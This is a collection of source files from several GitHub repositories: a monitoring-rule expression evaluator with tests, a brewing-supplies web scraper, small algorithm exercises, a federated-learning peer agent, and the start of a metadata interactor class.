< 1:\n return None\n flagname = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n\n progargs = GraphNodeExpression.evaluate(argname, context)\n argslen = len(progargs)\n flaglen = len(flagname)\n for pos in range(0, argslen):\n progarg = progargs[pos]\n progarglen = len(progarg)\n if progarg.startswith(flagname):\n if progarg == flagname:\n # -X foobar\n if (pos + 1) < argslen:\n return progargs[pos + 1]\n elif flaglen == 2 and progarglen > flaglen:\n # -Xfoobar -- single character flags only\n return progarg[2:]\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef OR(args, context):\n \"\"\"\n A function which evaluates each expression in turn, and returns the value\n of the first expression which is not None - or None\n \"\"\"\n # print('OR(%s)' % (str(args)), file=sys.stderr)\n if len(args) < 1:\n return None\n anyfalse = False\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is not None:\n if value:\n return value\n else:\n anyfalse = True\n return False if anyfalse else None\n\n\n@GraphNodeExpression.RegisterFun\ndef AND(args, context):\n \"\"\"\n A function which evaluates each expression in turn, and returns the value\n of the first expression which is not None - or None\n \"\"\"\n # print('AND(%s)' % (str(args)), file=sys.stderr)\n argisnone = True\n if len(args) < 1:\n return None\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is None:\n argisnone = None\n elif not value:\n # print('AND(%s) => False' % (str(args)), file=sys.stderr)\n return False\n # print('AND(%s) => %s' % (str(args), argisnone), file=sys.stderr)\n return argisnone\n\n\n@GraphNodeExpression.RegisterFun\ndef ATTRSEARCH(args, context):\n \"\"\"\n Search our first context object for an attribute with the given name and (if supplied) value.\n If 'value' is None, then we simply search for the given name.\n We return True if we found what we were looking for, and False otherwise.\n\n The object to search in is is args[0], the name is args[1],\n and the optional desired value is args[2].\n \"\"\"\n return True if FINDATTRVALUE(args, context) else False\n # return FINDATTRVALUE(args, context) is not None\n # These are equivalent. Not sure which is clearer...\n\n\n@GraphNodeExpression.RegisterFun\ndef FINDATTRVALUE(args, _context):\n \"\"\"\n Search our first context object for an attribute with the given name and (if supplied) value.\n We return the value found, if it is in the context objects, or None if it is not\n If 'value' is None, then we simply search for the given name.\n\n We return True if the desired value is None, and so is the value we found -\n otherwise we return the value associated with 'name' or None if not found.\n\n The object to search in is is args[0], the name is args[1],\n and the optional desired value is args[2].\n \"\"\"\n if len(args) not in (2, 3):\n print(\"WRONG NUMBER OF ARGUMENTS (%d) TO FINDATTRVALUE\" % (len(args)), file=sys.stderr)\n return None\n desiredvalue = args[2] if len(args) > 2 else None\n return _attrfind(args[0], args[1], desiredvalue)\n\n\ndef _is_scalar(obj):\n 'Return True if this object is a pyConfigContext/JSON \"scalar\"'\n return isinstance(obj, (six.string_types, int, float, bool, pyNetAddr))\n\n\ndef _attrfind(obj, name, desiredvalue):\n \"\"\"\n Recursively search the given object for an attribute with the given name\n and value. If 'value' is None, then we simply search for the given name.\n\n We return True if the desired value is None, and the value we found is also None -\n otherwise we return the value associated with 'name' or None if not found.\n \"\"\"\n if _is_scalar(obj):\n return None\n if hasattr(obj, \"__getitem__\"):\n for key in obj:\n keyval = obj[key]\n if key == name:\n if desiredvalue is None:\n return keyval if keyval is not None else True\n elif keyval == desiredvalue or str(keyval) == str(desiredvalue):\n # We use str() to allow pyNetAddr objects to compare equal\n # and the possibility of type mismatches (strings versus integers, for example)\n # This may also improve the chance of floating point compares working as\n # intended.\n return keyval\n elif hasattr(obj, \"__iter__\"):\n for elem in obj:\n ret = _attrfind(elem, name, desiredvalue)\n if ret is not None:\n return ret\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef PAMMODARGS(args, _context):\n \"\"\"\n We pass the following arguments to PAMSELECTARGS:\n section - the section value to select from\n service - service type to search for\n module - the module to select arguments from\n argument - the arguments to select\n\n We return the arguments from the first occurence of the module that we find.\n \"\"\"\n # print('PAMMODARGS(%s)' % (str(args)), file=sys.stderr)\n if len(args) != 4:\n print(\"WRONG NUMBER OF ARGUMENTS (%d) TO PAMMODARGS\" % (len(args)), file=sys.stderr)\n return False\n section = args[0]\n reqservice = args[1]\n reqmodule = args[2]\n reqarg = args[3]\n\n if section is None:\n # print('Section is None in PAM object', file=sys.stderr)\n return None\n # Each section is a list of lines\n for line in section:\n # Each line is a dict with potential keys of:\n # - service: a keyword saying what kind of service\n # - filename:(only for includes)\n # - type: dict of keywords (requisite, required, optional, etc)\n # - module: Module dict keywords with:\n # - path - pathname of module ending in .so\n # - other arguments as per the module's requirements\n # simple flags without '=' values show up with True as value\n #\n if \"service\" not in line or line[\"service\"] != reqservice:\n # print('Service %s not in PAM line %s' % (reqservice, str(line)), file=sys.stderr)\n continue\n if \"module\" not in line:\n # print('\"module\" not in PAM line %s' % str(line), file=sys.stderr)\n continue\n if \"path\" not in line[\"module\"]:\n # print('\"path\" not in PAM module %s' % str(line['module']), file=sys.stderr)\n # print('\"path\" not in PAM line %s' % str(line), file=sys.stderr)\n continue\n modargs = line[\"module\"]\n if reqmodule != \"ANY\" and (\n modargs[\"path\"] != reqmodule and modargs[\"path\"] != (reqmodule + \".so\")\n ):\n # print('Module %s not in PAM line %s' % (reqmodule, str(line)), file=sys.stderr)\n continue\n ret = modargs[reqarg] if reqarg in modargs else None\n if ret is None and reqmodule == \"ANY\":\n continue\n # print('RETURNING %s from %s' % (ret, str(line)), file=sys.stderr)\n return ret\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef MUST(args, _unused_context):\n \"Return True if all args are True. A None arg is the same as False to us\"\n # print('CALLING MUST%s' % str(tuple(args)), file=sys.stderr)\n if not hasattr(args, \"__iter__\") or isinstance(args, six.string_types):\n args = (args,)\n for arg in args:\n if arg is None or not arg:\n # print('+++MUST returns FALSE', file=sys.stderr)\n return False\n # print('+++MUST returns TRUE', file=sys.stderr)\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef NONEOK(args, _unused_context):\n \"Return True if all args are True or None - that is, if no args are False\"\n # print('CALLING MUST%s' % str(tuple(args)), file=sys.stderr)\n if not hasattr(args, \"__iter__\") or isinstance(args, six.string_types):\n args = (args,)\n for arg in args:\n if arg is not None and not arg:\n # print('+++NONEOK returns FALSE', file=sys.stderr)\n return False\n # print('+++NONEOK returns TRUE', file=sys.stderr)\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef FOREACH(args, context):\n \"\"\"Applies the (string) expression (across all values in the context,\n returning the 'AND' of the evaluation of the expression-evaluations\n across the top level values in the context. It stops evaluation on\n the first False return.\n\n The final argument is the expression (predicate) to be evaluated. Any\n previous arguments in 'args' are expressions to be evaluated in the context\n 'context' then used as the 'context' for this the expression in this FOREACH.\n Note that this desired predicate is a _string_, which is then evaluated\n (like 'eval'). It is not a normal expression, but a string containing\n an expression. You _will_ have to quote it.\n\n When given a single argument, it will evaluate the string expression\n for each of top-level values in the object. Normally this would be the 'data'\n portion of a discovery object. So, for example, if each of the top level keys\n is a file name and the values are file properties, then it will evaluate the\n expression on the properties of every file in the object.\n\n If you need to evaluate this across all the elements of a sub-object named\n \"filenames\" in the top level \"data\" object then you give \"$filenames\" as the\n context argument, and your predicate as the expression like this:\n [\"$filenames\", \"\"].\n\n The code to do this is simpler than the explanation ;-)\n \"\"\"\n anynone = False\n if len(args) == 1:\n objectlist = context.objects\n else:\n objectlist = [GraphNodeExpression.evaluate(obj, context) for obj in args[:-1]]\n\n expressionstring = args[-1]\n if not isinstance(expressionstring, six.string_types):\n print(\n \"FOREACH expression must be a string, not %s\" % type(expressionstring), file=sys.stderr\n )\n return False\n # print('OBJECTLIST is:', objectlist, file=sys.stderr)\n for obj in objectlist:\n # print('OBJ is:', obj, file=sys.stderr)\n for key in obj:\n item = obj[key]\n if not hasattr(item, \"__contains__\") or not hasattr(item, \"__iter__\"):\n print(\"UNSUITABLE FOREACH CONTEXT[%s]: %s\" % (key, item), file=sys.stderr)\n continue\n # print(sys.stderr, 'CREATING CONTEXT[%s]: %s' % (key, item), file=sys.stderr)\n itemcontext = ExpressionContext(item)\n # print('CONTEXT IS:', itemcontext, file=sys.stderr)\n value = GraphNodeExpression.evaluate(expressionstring, itemcontext)\n # print('VALUE of %s IS [%s] in context: %s' % (str(args), value, item), file=sys.stderr)\n if value is None:\n anynone = True\n elif not value:\n return False\n return None if anynone else True\n\n\n@GraphNodeExpression.RegisterFun\ndef bitwiseOR(args, context):\n \"\"\"\n A function which evaluates the each expression and returns the bitwise OR of\n all the expressions given as arguments\n \"\"\"\n if len(args) < 2:\n return None\n result = 0\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is None:\n return None\n result |= int(value)\n return result\n\n\n@GraphNodeExpression.RegisterFun\ndef bitwiseAND(args, context):\n \"\"\"\n A function which evaluates the each expression and returns the bitwise AND of\n all the expressions given as arguments\n \"\"\"\n if len(args) < 2:\n return None\n result = int(args[0])\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is None:\n return None\n result &= int(value)\n return result\n\n\n@GraphNodeExpression.RegisterFun\ndef is_upstartjob(args, context):\n \"\"\"\n Returns \"true\" if any of its arguments names an upstart job, \"false\" otherwise\n If no arguments are given, it returns whether this system has upstart enabled.\n \"\"\"\n\n from monitoring import MonitoringRule\n\n agentcache = MonitoringRule.compute_available_agents(context)\n\n if \"upstart\" not in agentcache or len(agentcache[\"upstart\"]) == 0:\n return \"false\"\n\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value in agentcache[\"upstart\"]:\n return \"true\"\n return len(args) == 0\n\n\ndef _regexmatch(key):\n \"\"\"Handy internal function to pull out the IP and port into a pyNetAddr\n Note that the format is the format used in the discovery information\n which in turn is the format used by netstat.\n This is not a \"standard\" format, but it's what netstat uses - so it's\n what we use.\n \"\"\"\n mobj = ipportregex.match(key)\n if mobj is None:\n return None\n (ip, port) = mobj.groups()\n ipport = pyNetAddr(ip, port=int(port))\n if ipport.isanyaddr():\n if ipport.addrtype() == ADDR_FAMILY_IPV4:\n ipport = pyNetAddr(\"127.0.0.1\", port=ipport.port())\n else:\n ipport = pyNetAddr(\"::1\", port=ipport.port())\n return ipport\n\n\ndef _collect_ip_ports(service):\n \"Collect out complete set of IP/Port combinations for this service\"\n portlist = {}\n for key in service.keys():\n ipport = _regexmatch(key)\n if ipport.port() == 0:\n continue\n port = ipport.port()\n if port in portlist:\n portlist[port].append(ipport)\n else:\n portlist[port] = [ipport]\n return portlist\n\n\n# Netstat format IP:port pattern\nipportregex = re.compile(\"(.*):([^:]*)$\")\n\n\ndef selectanipport(arg, _context, preferlowestport=True, preferv4=True):\n \"\"\"This function searches discovery information for a suitable IP\n address/port combination to go with the service.\n \"\"\"\n\n # print('SELECTANIPPORT(%s)' % arg, file=sys.stderr)\n try:\n\n portlist = _collect_ip_ports(arg)\n portkeys = list(portlist.keys())\n if preferlowestport:\n portkeys.sort()\n for p in portlist[portkeys[0]]:\n if preferv4:\n if p.addrtype() == ADDR_FAMILY_IPV4:\n return p\n else:\n if p.addrtype() == ADDR_FAMILY_IPV6:\n return p\n return portlist[portkeys[0]][0]\n except (KeyError, ValueError, TypeError, IndexError):\n # Something is hinky with this data\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceip(args, context):\n \"\"\"\n This function searches discovery information for a suitable concrete IP\n address for a service.\n The argument to this function tells it an expression that will give\n it the hash table (map) of IP/port combinations for this service.\n \"\"\"\n if len(args) == 0:\n args = (\"$procinfo.listenaddrs\",)\n # print('SERVICEIP(%s)' % str(args), file=sys.stderr)\n for arg in args:\n nmap = GraphNodeExpression.evaluate(arg, context)\n if nmap is None:\n continue\n # print('serviceip.SELECTANIPPORT(%s)' % (nmap), file=sys.stderr)\n ipport = selectanipport(nmap, context)\n if ipport is None:\n continue\n ipport.setport(0) # Make sure return value doesn't include the port\n # print('IPPORT(%s)' % str(ipport), file=sys.stderr)\n return str(ipport)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceport(args, context):\n \"\"\"\n This function searches discovery information for a suitable port for a service.\n The argument to this function tells it an expression that will give\n it the hash table (map) of IP/port combinations for this service.\n \"\"\"\n if len(args) == 0:\n args = (\"$procinfo.listenaddrs\",)\n # print('SERVICEPORT ARGS are %s' % (str(args)), file=sys.stderr)\n for arg in args:\n nmap = GraphNodeExpression.evaluate(arg, context)\n if nmap is None:\n continue\n port = selectanipport(nmap, context).port()\n if port is None:\n continue\n return str(port)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceipport(args, context):\n \"\"\"\n This function searches discovery information for a suitable ip:port combination.\n The argument to this function tells it an expression that will give\n it the hash table (map) of IP/port combinations for this service.\n The return value is a legal ip:port combination for the given\n address type (ipv4 or ipv6)\n \"\"\"\n if len(args) == 0:\n args = (\"$procinfo.listenaddrs\",)\n for arg in args:\n nmap = GraphNodeExpression.evaluate(arg, context)\n if nmap is None:\n continue\n ipport = selectanipport(nmap, context)\n if ipport is None:\n continue\n return str(ipport)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef basename(args, context):\n \"\"\"\n This function returns the basename from a pathname.\n If no pathname is supplied, then the executable name is assumed.\n \"\"\"\n if isinstance(args, six.string_types):\n args = (args,)\n if len(args) == 0:\n args = (\"$pathname\",) # Default to the name of the executable\n for arg in args:\n pathname = GraphNodeExpression.evaluate(arg, context)\n if pathname is None:\n continue\n # print('BASENAME(%s) => %s' % ( pathname, file=sys.stderr)\n # , os.path.basename(pathname))\n return os.path.basename(pathname)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef dirname(args, context):\n \"\"\"\n This function returns the directory name from a pathname.\n If no pathname is supplied, then the discovered service executable name is assumed.\n \"\"\"\n if isinstance(args, six.string_types):\n args = (args,)\n if len(args) == 0:\n args = (\"$pathname\",) # Default to the name of the executable\n for arg in args:\n pathname = GraphNodeExpression.evaluate(arg, context)\n if pathname is None:\n continue\n return os.path.dirname(pathname)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef hascmd(args, context):\n \"\"\"\n This function returns True if the given list of commands are all present on the given Drone.\n It determines this by looking at the value of $_init_commands.data\n \"\"\"\n cmdlist = GraphNodeExpression.evaluate(\"$_init_commands.data\", context)\n for arg in args:\n if cmdlist is None or arg not in cmdlist:\n return None\n return True\n\n\nif __name__ == \"__main__\":\n\n def simpletests():\n \"\"\"These tests don't require a real context\"\"\"\n assert NOT((True,), None) is False\n assert NOT((False,), None) is True\n assert EQ((1, 1, \"1\"), None) is True\n assert NOT(EQ((1,), None), None) is None\n assert MUST(NOT(EQ((1,), None), None), None) is False\n assert NONEOK(NOT(EQ((1,), None), None), None) is True\n assert NOT(EQ((1, 1, \"2\"), None), None) is True\n assert NOT(EQ((0, 0, \"2\"), None), None) is True\n assert EQ((\"a\", \"a\", \"a\"), None) is True\n assert EQ((\"0\", \"0\", 0), None) is True\n assert NOT(NE((1, 1, \"1\"), None), None) is True\n assert NOT(NE((1,), None), None) is None\n assert NONEOK(NOT(NE((1,), None), None), None) is True\n assert MUST(NOT(NE((1,), None), None), None) is False\n assert NOT(NE((1, 1, \"2\"), None), None) is True\n assert NOT(NE((0, 0, \"2\"), None), None) is True\n assert NOT(NE((\"a\", \"a\", \"a\"), None), None) is True\n assert NOT(NE((\"0\", \"0\", 0), None), None) is True\n assert LE((1, 1), None) is True\n assert LE((1, 5), None) is True\n assert NOT(LT((1, 1), None), None) is True\n assert LT((1, 5), None) is True\n assert NOT(GT((1, 1), None), None) is True\n assert GE((1, 1), None) is True\n assert IN((1, 2, 3, 4, 1), None) is True\n assert IN((1, 2, 3, 4, \"1\"), None) is True\n assert NOT(IN((1, 2, 3, 4), None), None) is True\n assert NOT(NOTIN((1, 2, 3, 4, 1), None), None) is True\n assert NOT(NOTIN((1, 2, 3, 4, \"1\"), None), None) is True\n assert NOTIN((1, 2, 3, 4), None) is True\n assert bitwiseOR((1, 2, 4), None) == 7\n assert bitwiseOR((1, 2, \"4\"), None) == 7\n assert bitwiseAND((7, 3), None) == 3\n assert bitwiseAND((7, 1, \"2\"), None) == 0\n assert bitwiseAND((\"15\", \"7\", \"3\"), None) == 3\n assert IGNORE((False, False, False), None)\n assert MUST(None, None) is False\n assert MUST(True, None) is True\n assert MUST(False, None) is False\n assert NONEOK(None, None) is True\n assert NONEOK(True, None) is True\n assert NONEOK(False, None) is False\n assert match((\"fred\", \"fre\"), None)\n assert match((\"fred\", \"FRE\"), None) is False\n assert match((\"fred\", \"FRE\", \"I\"), None) is True\n assert basename((\"/dev/null\"), None) == \"null\"\n assert dirname((\"/dev/null\"), None) == \"/dev\"\n print(\"Simple tests passed.\", file=sys.stderr)\n\n def contexttests():\n \"GraphNodeExpression tests that need a context\"\n\n lsattrs = \"\"\"{\n \"/var/log/audit/\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"d\", \"perms\": {\"owner\":{\"read\":true, \"write\":true, \"exec\":true, \"setid\":false}, \"group\": {\"read\":true, \"write\":false, \"exec\":true, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0750\"},\n \"/var/log/audit/audit.log\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"-\", \"perms\": {\"owner\":{\"read\":true, \"write\":true, \"exec\":false, \"setid\":false}, \"group\": {\"read\":false, \"write\":false, \"exec\":false, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0600\"},\n \"/var/log/audit/audit.log.1\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"-\", \"perms\": {\"owner\":{\"read\":true, \"write\":false, \"exec\":false, \"setid\":false}, \"group\": {\"read\":false, \"write\":false, \"exec\":false, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0400\"}\n}\"\"\"\n lscontext = ExpressionContext(pyConfigContext(lsattrs))\n\n Pie_context = ExpressionContext(\n (\n pyConfigContext(\n {\n \"a\": {\"b\": \"c\", \"pie\": 3, \"pi\": 3, \"const\": \"constant\"},\n \"f\": {\"g\": \"h\", \"pie\": \"3\", \"pi\": 3, \"const\": \"constant\"},\n }\n ),\n pyConfigContext({\"math\": {\"pi\": 3.14159, \"pie\": 3, \"const\": \"constant\"}}),\n pyConfigContext({\"geography\": {\"Europe\": \"big\", \"const\": \"constant\"}}),\n )\n )\n complicated_context = ExpressionContext(pyConfigContext({\"a\": {\"b\": {\"pie\": 3}}}))\n argcontext = ExpressionContext(\n pyConfigContext('{\"argv\": [\"command-name-suffix\", \"thing-one\", \"thang-two\"]}')\n )\n\n assert FOREACH((\"EQ(False, $perms.group.write, $perms.other.write)\",), lscontext) is True\n assert FOREACH((\"EQ($pi, 3)\",), Pie_context) is False\n assert FOREACH((\"EQ($pie, 3)\",), Pie_context) is None\n assert FOREACH((\"$a\", \"EQ($pie, 3)\"), complicated_context) is True\n assert FOREACH((\"$a\", \"EQ($pie, 3.14159)\"), complicated_context) is False\n assert FOREACH((\"$a\", \"EQ($pi, 3.14159)\"), complicated_context) is None\n assert FOREACH((\"EQ($const, constant)\",), Pie_context) is True\n assert GraphNodeExpression.evaluate(\"EQ($math.pie, 3)\", Pie_context) is True\n assert FOREACH((\"EQ($group, root)\",), lscontext) is True\n assert FOREACH((\"EQ($owner, root)\",), lscontext) is True\n assert FOREACH((\"AND(EQ($owner, root), EQ($group, root))\",), lscontext) is True\n assert argmatch((\"thing-(.*)\",), argcontext) == \"one\"\n assert argmatch((\"THING-(.*)\", \"$argv\", \"I\"), argcontext) == \"one\"\n assert argmatch((\"thang-(.*)\",), argcontext) == \"two\"\n assert argmatch((\"THANG-(.*)\", \"$argv\", \"I\"), argcontext) == \"two\"\n assert argmatch((\"thang-.*\",), argcontext) == \"thang-two\"\n assert argmatch((\"THANG-.*\", \"$argv\", \"I\"), argcontext) == \"thang-two\"\n print(\"Context tests passed.\", file=sys.stderr)\n\n simpletests()\n contexttests()\n print(\"All tests passed.\", file=sys.stderr)\n","repo_name":"assimilation/assimilation-official","sub_path":"cma/graphnodeexpression.py","file_name":"graphnodeexpression.py","file_ext":"py","file_size_in_byte":48328,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"18"}
+{"seq_id":"31521326122","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\nfrom selenium import webdriver\nimport time\n\n\nclass leagueofbrewers():\n \"\"\"\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n self.BASE_URL = 'https://leagueofbrewers.co.nz/homebrew-beer-supplies/beer-brewing-ingredients/'\n self.grain_url = 'malt-for-making-beer/grain-for-brewing?limit=25'\n self.liquid_yeast_url = 'beer-brewing-yeast/liquid-yeast-for-beer?limit=25'\n self.dry_yeast = 'beer-brewing-yeast/dry-yeast-for-beer?limit=25'\n self.hops_url = 'hops-for-brewing-beer?limit=25'\n # self.all_urls = [self.hops_url, self.grain_url, self.dry_yeast, self.liquid_yeast_url]\n self.all_urls = [self.liquid_yeast_url]\n self.s = requests.session()\n return\n\n def update_products(self):\n \"\"\"\n go through all types of products and update the database\n :return:\n \"\"\"\n for product_url in self.all_urls:\n entire_page = self._load_entire_page(self.BASE_URL+product_url)\n details = self._update_single_product(entire_page)\n self._store(details)\n return\n\n def _load_entire_page(self, url):\n \"\"\"\n Use selenium driver to load chrome, scroll then pass resultant html.\n :return:\n \"\"\"\n options = webdriver.ChromeOptions()\n options.add_argument('headless')\n options.add_argument('chromedriver')\n driver = webdriver.Chrome(options=options)\n driver.get(url)\n ScrollNumber = 20\n for i in range(1, ScrollNumber):\n driver.execute_script(\"window.scrollTo(1,50000)\")\n time.sleep(1)\n return driver.page_source\n\n def _parseurl(self, url, sub='get', payload=''):\n if sub == 'get':\n r = self.s.get(url, verify=False)\n else:\n r = self.s.post(url, data=payload, verify=False)\n return r\n\n def _update_single_product(self, html):\n \"\"\"\n works for malt, yeast and hops. doest load the whole page however, need to work out how to JS loading whole page\n\n :param product_url: 'beer-brewing-yeast'\n :return:\n \"\"\"\n product_details = []\n soup = BeautifulSoup(html, features=\"html.parser\")\n for product in soup.findAll(class_='product-image'):\n product_name = product.img['alt']\n product_price = product.find(class_='price').text\n product_link = product.a['href']\n if product.find(class_='backorder'):\n product_availability = 0\n else:\n product_availability = 1\n product_details.append((product_name, product_price, product_link, product_availability))\n return product_details\n\n def _store(self, deets_array):\n \"\"\"\n Store the details of the items\n :return:\n \"\"\"\n for a in deets_array:\n for b in a:\n print(b)\n print(len(deets_array))\n\n\nif __name__ == '__main__':\n t = leagueofbrewers()\n t.update_products()\n","repo_name":"wookienz/homebrewstore","sub_path":"classes/leagueofbrewers.py","file_name":"leagueofbrewers.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"28963843763","text":"import sys\n\n\n# leet code test\ndef find(arr, fee, sA=0):\n if len(arr) == 0: return 0\n bA = -arr[0]\n for i in arr[1:]:\n nBA = max(bA, sA - i)\n nSA = max(sA, bA + i - fee)\n bA = nBA\n sA = nSA\n return sA\n\n\n# result=13\nfee = 3\ninput = [0, 5, 7, 10, 6, 8, 12, 10, 12, 10, 13, 15]\n# result=6\nfee = 3\ninput = [1, 3, 7, 5, 10, 3]\n# result=8\nfee = 2\ninput = [1, 3, 2, 8, 4, 9]\n# result=0\nfee = 3\ninput = [9, 8, 7, 1, 2]\n# result=0\nfee = 0\ninput = [1]\n# result=4\nfee = 1\ninput = [2, 1, 4, 4, 2, 3, 2, 5, 1, 2]\nprint(find(input, fee))\n","repo_name":"PalampurRockstar/Algorithm","sub_path":"src/main/python/algo/medium/BuyAndSellStockInfiniteTransactionEachWithFee.py","file_name":"BuyAndSellStockInfiniteTransactionEachWithFee.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"74650609320","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef move(n, a, b, c):\n\tprint(\"move({0},{1},{2},{3})\".format(n,a,b,c))\n\tif n == 1:\n\t\tprint(\"从 {0} 移动到 {1}\".format(a,c))\n\telse:\n\t\tmove(n-1, a, c, b) # 借助 c 将 \n\t\tmove(1, a, b, c)\n\t\tmove(n-1, b, a, c)\n\nif __name__ == '__main__': \n\tmove(3, 'A', 'B', 'C')","repo_name":"leeliang/python-learning","sub_path":"code/00_Hanoi.py","file_name":"00_Hanoi.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"15282632880","text":"from p2p.agents.sync_agent import *\nfrom models.abstract_model import weights_average\nimport numpy as np\n\n# Decentralized federated learning of deep neural networks on non-iid data\n# Authors: Onoszko, Noa\n# Karlsson, Gustav\n# Mogren, Olof\n# Zec, Edvin Listo\n\n\nclass PensAgent(SyncAgent):\n def __init__(self, rounds=100, n_sampled=6, top_m=3, n_peers=3, fixed_comm=False, **kwargs):\n super(PensAgent, self).__init__(**kwargs)\n self.rounds = rounds\n self.n_sampled = n_sampled\n self.top_m = top_m\n self.n_peers = n_peers\n self.fixed_comm = fixed_comm\n self.iteration = 0\n self.selected_peers = {}\n self.new_weights = None\n\n def train_fn(self):\n if self.new_weights is not None:\n self.set_model_weights(self.new_weights)\n self.new_weights = None\n self.iteration += 1\n return super(PensAgent, self).train_fn()\n\n def pull_from_peers(self):\n if self.iteration < self.rounds:\n p = np.arange(self.graph.nodes_num)\n p = p[p != self.id]\n indx = np.random.choice(p, self.n_sampled, replace=False)\n peers = [p for p in self.graph.nodes if p.id in indx]\n # peers = np.random.choice(list(set(self.graph.nodes) - {self}), self.n_sampled, replace=False)\n else:\n expected_samples = (self.top_m / self.graph.nodes_num) * self.rounds\n peers = [k for k, v in self.selected_peers.items() if v > expected_samples]\n indx = np.random.choice(np.array([p.id for p in peers]), self.n_peers, replace=False)\n peers = [p for p in peers if p.id in indx]\n # peers = np.random.choice(peers, size=self.n_peers, replace=False)\n if self.fixed_comm:\n graph_peers = self.graph.get_peers(self.id)\n # If the comm matrix is built, use that peers in fixed communication\n if len(graph_peers) != 0:\n peers = graph_peers\n for peer in peers:\n super(PensAgent, self).receive_message(peer)\n\n if self.iteration < self.rounds:\n saved_models = {self.eval_model_loss(p.model, self.train): p for p in peers}\n peers = list(dict(sorted(saved_models.items())).values())[:self.top_m]\n for peer in peers:\n # We want to receive more messages from this peer so mark as selected peer\n if peer not in self.selected_peers:\n self.selected_peers[peer] = 0\n self.selected_peers[peer] += 1\n\n alphas = [self.train_len] + [peer.train_len for peer in peers]\n ws = [self.get_model_weights()] + [peer.get_model_weights() for peer in peers]\n self.new_weights = weights_average(ws, alphas)\n\n self.hist['selected_peers'] = {p.id: v for p, v in self.selected_peers.items()}\n\n def sync_parameters(self):\n self.pull_from_peers()\n\n def update_parameters(self):\n pass\n","repo_name":"rosaj/p2p_sgd","sub_path":"p2p/agents/pens_agent.py","file_name":"pens_agent.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6232574327","text":"import logging\nfrom abc import abstractmethod\nfrom datetime import datetime\n\nimport gevent\nfrom about_time import about_time\nfrom cached_property import threaded_cached_property\nfrom gevent import Timeout, joinall, killall\n\nfrom metadata.backend.interface import BackendType\nfrom metadata.exc import InteractTimeOut, NotImplementedByBackendError\nfrom metadata.interactor.core import TransactionalOperations\nfrom metadata.interactor.orchestrate import (\n BatchDGraphOrchestrator,\n BatchMySQLReplicaOrchestrator,\n MySQLReplicaOrchestrator,\n SingleDGraphOrchestrator,\n)\nfrom metadata.interactor.record import LocalRecordsPersistence\nfrom metadata.interactor.transcation import TransactionalDispatchMixIn\nfrom metadata.runtime import rt_context, rt_local, rt_local_manager\nfrom metadata.util.common import StrictABCMeta\nfrom metadata.util.context import inherit_local_ctx\nfrom metadata.util.i18n import selfish as _\n\n\nclass Interactor(object, metaclass=StrictABCMeta):\n __abstract__ = True\n\n def __init__(self, backends_in_use, timeout_sec=None, if_recording=True):\n self.backends_in_use = backends_in_use\n self.config_collection = rt_context.config_collection\n self.timeout_sec = (\n self.config_collection.interactor_config.INTERACTOR_TIMEOUT if not timeout_sec else self.timeout_sec\n )\n self.son_timeout_sec = self.timeout_sec - 5 if self.timeout_sec > 10 else self.timeout_sec\n self.if_recording = if_recording\n self.local_persistence = LocalRecordsPersistence()\n self.transactional_operations = None\n self.operate_records = None\n self.batch = False\n self.transaction_count = 0\n\n self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)\n\n @threaded_cached_property\n def sessions(self):\n \"\"\"\n Interactor使用的各类session。\n\n \"\"\"\n sessions = {}\n if self.backends_in_use.get(BackendType.MYSQL, False):\n sessions[BackendType.MYSQL] = rt_context.mysql_backend.operate_session().session\n if self.backends_in_use.get(BackendType.DGRAPH, False):\n sessions[BackendType.DGRAPH] = rt_context.dgraph_backend.operate_session()\n if self.backends_in_use.get(BackendType.DGRAPH_BACKUP, False):\n sessions[BackendType.DGRAPH_BACKUP] = rt_context.dgraph_backup_backend.operate_session()\n if self.backends_in_use.get(BackendType.DGRAPH_COLD, False):\n sessions[BackendType.DGRAPH_COLD] = rt_context.dgraph_cold_backend.operate_session()\n db_name = self.backends_in_use.get(BackendType.CONFIG_DB, None)\n if db_name:\n sessions[BackendType.CONFIG_DB] = rt_context.biz_mysql_backends[db_name].operate_session().session\n return sessions\n\n @abstractmethod\n def dispatch(self, *args, **kwargs):\n \"\"\"\n 与后端进行一次完整交互。\n\n \"\"\"\n pass\n\n @abstractmethod\n def invoke(self, *args, **kwargs):\n \"\"\"\n 